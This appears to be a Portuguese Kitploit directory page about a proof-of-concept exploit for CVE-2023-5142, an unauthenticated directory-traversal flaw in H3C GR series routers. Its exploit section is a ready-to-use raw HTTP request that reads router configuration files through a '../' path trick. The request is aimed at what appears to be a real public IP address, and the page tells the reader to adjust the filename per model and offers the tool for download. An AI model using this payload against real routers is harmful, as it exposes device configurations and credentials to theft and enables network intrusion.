Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-H3C-Report — Exploit de PoC para CVE-2023-5142 direcionado a roteadores da série H3C GR, com uma vulnerabilidade de travessia de diretório não autenticada para extrair arquivos de configuração sensíveis. | Kitploit
Ferramentas/GitHubGitHub/kuangxiaotu/cve-h3c-report
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesConfiguração Incorreta
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

Exploit de PoC para CVE-2023-5142 direcionado a roteadores da série H3C GR, com uma vulnerabilidade de travessia de diretório não autenticada para extrair arquivos de configuração sensíveis.

Ver Repositório
24há 3 anosAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de gerenciamento do roteador da série GR da H3C tem vulnerabilidade de acesso não autorizado

Produto: Roteador da série GR

versão: todas

avaliação: alto risco

website: http://www.h3c.com/

Riscos: Os invasores podem explorar esta vulnerabilidade para obter informações confidenciais dos roteadores, construindo pacotes de solicitação especiais para contornar a verificação de identidade.

princípio: O roteador não autenticou o acesso ao diretório e aos arquivos relacionados

exp:

Nota: É necessário modificar o sufixo do nome do arquivo no POC, como GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

Baixar ferramenta